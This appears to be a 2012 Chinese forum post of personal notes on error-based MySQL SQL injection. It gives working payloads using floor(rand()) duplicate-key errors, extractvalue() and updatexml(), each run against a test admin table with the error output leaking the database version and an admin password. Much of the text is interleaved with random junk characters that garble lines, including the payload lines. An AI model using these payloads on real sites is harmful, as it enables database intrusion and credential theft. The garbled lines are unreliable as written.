放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。/ G5 P/ _2 A/ H0 [+ t+ x: U. V4 [
实际测试环境:
7 O' G- ~& P# s: Y1 ?" Z9 V6 O' [4 a: e6 f6 D: p: ]. o
) S, K n1 m r0 @' ?mysql> show tables;
: K+ z8 h8 b3 P' n! h+----------------+
8 F) @/ b/ z8 D: i6 X) a| Tables_in_test |
: H, \* T% _; x* f+----------------+
+ g4 E! Z( S% N| admin |) W& H3 o1 k; m. C! ~0 K2 y
| article |7 O6 [ k9 ]& y/ @
+----------------+
/ ^' C- I4 ~2 ?6 { D / _: @% e4 ?4 K; ]0 k6 F2 f
; M& z; A: o+ E) a5 q3 s6 z6 [% C0 }/ k
0 O; y; M+ w! X! q2 j4 F% kmysql> describe admin;
* Z, ^$ W) `( w8 e% N# a3 e+-------+------------------+------+-----+---------+----------------+) L6 r6 x% B6 ~6 |" G1 g
| Field | Type | Null | Key | Default | Extra |
7 m. |0 `! G( N s+-------+------------------+------+-----+---------+----------------+
$ w$ j" x: o" j2 }( Y| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- C+ _0 Y2 y" I/ F# T. v| user | varchar(50) | NO | | NULL | |
8 ~* C. V3 v% P* Z* J| pass | varchar(50) | NO | | NULL | |
" f6 e% f& y2 H0 K+ b+-------+------------------+------+-----+---------+----------------+- r+ o# n- C; u+ G o
! f9 q& @0 v% M9 H: `# V, }' ]
1 N3 c/ m" x) r+ C; l
2 r" R0 d) x t( d) a* Amysql> describe article;
4 v7 C" }2 q, a9 C7 e2 ~+---------+------------------+------+-----+---------+----------------+
! _ O2 T6 R0 T; ~3 t+ [ w0 x* \| Field | Type | Null | Key | Default | Extra |
7 P" v, j( F9 X8 i7 O! ~4 P0 u1 s+---------+------------------+------+-----+---------+----------------+5 X) p3 d# m/ a6 T! w
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
+ I/ s/ @) X+ q$ I) ]/ W- {7 x8 p| title | varchar(50) | NO | | NULL | |% J* J. \- x. O. j( |! q" q
| content | varchar(50) | NO | | NULL | |' V" u& K' m! `1 S
+---------+------------------+------+-----+---------+----------------+
5 X: S/ C! B. { @1、通过floor报错
6 D2 j4 u2 _3 w/ D$ z可以通过如下一些利用代码+ v% |8 N/ Q+ @" g/ b) G( p( l
+ l# F0 A, S6 n6 @2 Z! c, `/ y- g3 X
u) y# H6 g J/ Q1 a2 |
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x! l q) X6 n! h& C8 W' g( u
from information_schema.tables group by x)a);2 }3 N. U+ @# S+ S
" T- Y4 q5 C, M+ o3 d
2 L y- H! H; G( Eand (select count(*) from (select 1 union select null union select !1)x
, @ Z2 e) c' y$ Y! A9 y) v. bgroup by concat((select table_name from information_schema.tables limit 1),5 j. V1 N4 I. f# D: b
floor(rand(0)*2)));9 @# V$ O/ ^' W2 u1 a9 a
举例如下:0 ]& W# G- t5 d M7 ~1 `. [/ S
首先进行正常查询:
1 w' c) y0 d) S 6 p/ j/ u& e M0 W2 G
mysql> select * from article where id = 1;0 ]3 G7 k/ K' X7 `! g+ m8 \- A. Y
+----+-------+---------+
$ u$ o& w" ~4 t4 q| id | title | content |
, `- }+ q$ v+ g+----+-------+---------+8 _7 O6 _9 _# G) @3 G5 N0 H' G" ]& c
| 1 | test | do it |
( Z3 n, {8 R! e; P# r+----+-------+---------+
1 A, @3 D& ?6 V ], Z8 G x假如id输入存在注入的话,可以通过如下语句进行报错。6 w0 }. Q7 c! J. K8 k8 Q9 {& z
+ H+ S( R- I" I
|1 f6 D7 l4 G6 T. ]# u8 Kmysql> select * from article where id = 1 and (select 1 from
0 h! z! s& P3 n, R(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
" I2 ]' p& e# L( [( g8 m4 X- ~" Y/ IERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'0 K n( p+ j5 U* M- S# C6 l! |3 ~
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。$ ~: c0 E+ k" s% r; `$ a. z/ p
例如我们需要查询管理员用户名和密码:9 j/ N7 y3 L: Q5 q/ J
Method1:
, i- q1 h5 I( Z/ F" F: q4 | ; b2 `( ~# [' B y% v6 K$ M
$ o4 J7 b$ U* R- u, x" rmysql> select * from article where id = 1 and (select 1 from
8 U2 I. M6 ?/ {" K |(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
* y5 b' {; R( H0 G; @% f9 Zfrom information_schema.tables group by x)a);
9 |1 t- m! h5 F4 C+ Y) z3 X7 z: N c* gERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
$ w5 M) z# W# k8 h9 p& }: nMethod2:
! ] Z; g4 o# x4 G! h" M$ t
3 O7 k2 g( T* E5 S5 p, {7 v: ?
& _: I4 j4 O) q# Y# Wmysql> select * from article where id = 1 and (select count(*); @, r- E9 u- E6 f- H$ N% u4 `! E
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
/ E* H# u- B+ Ifloor(rand(0)*2)));( V% A Y4 l, J# |2 M
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! X$ t$ `8 [! A3 C/ x
2、ExtractValue
4 r" \8 m; `( j% L7 |! y测试语句如下
5 d1 s9 x: b. ~6 O 0 J9 t4 r, z) y4 R- U# C' J
. y F3 z7 R3 x0 k" j+ r, u2 @8 Oand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
0 @5 g& z B) s1 q7 x" M4 V实际测试过程
# K2 ^+ \) i3 p* M) N2 X; o- z, J
3 g5 E3 x, m. M9 ~% O ' q. z4 _' s0 Q) y! k$ W
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,3 u" s$ m9 e: ~
(select pass from admin limit 1)));--
! G3 \' g/ y( \ERROR 1105 (HY000): XPATH syntax error: '\admin888'! M! G0 ^2 ^& A7 \& Z9 p6 {
3、UpdateXml8 c- B+ P" Q0 c2 R
测试语句
$ @1 t# g/ Q9 y7 H% s+ {( H ) o/ g2 Z3 i4 X1 ^) s, x
* M; ]) a( ?, G5 h7 z: b% U2 [and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
( Z5 z6 g* n1 x/ G实际测试过程
5 B" F6 A5 |3 T
" Y5 S/ b( f4 A' A! J" U : A+ [+ m" K* r6 j5 i' P
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
8 V% U& E. g) R1 _# k(select pass from admin limit 1),0x5e24),1));
; b) W7 j7 X" Y1 |$ H$ x8 oERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'# ?( u8 R" d/ ~5 A/ `
All, thanks foreign guys.
5 j% d% ]$ o7 e# \7 S5 u $ e. p( r/ I. k1 [) {2 f' p
& R3 x4 i' W) q! L
|
发表于 2012-12-10 10:28:51
收藏
支持
反对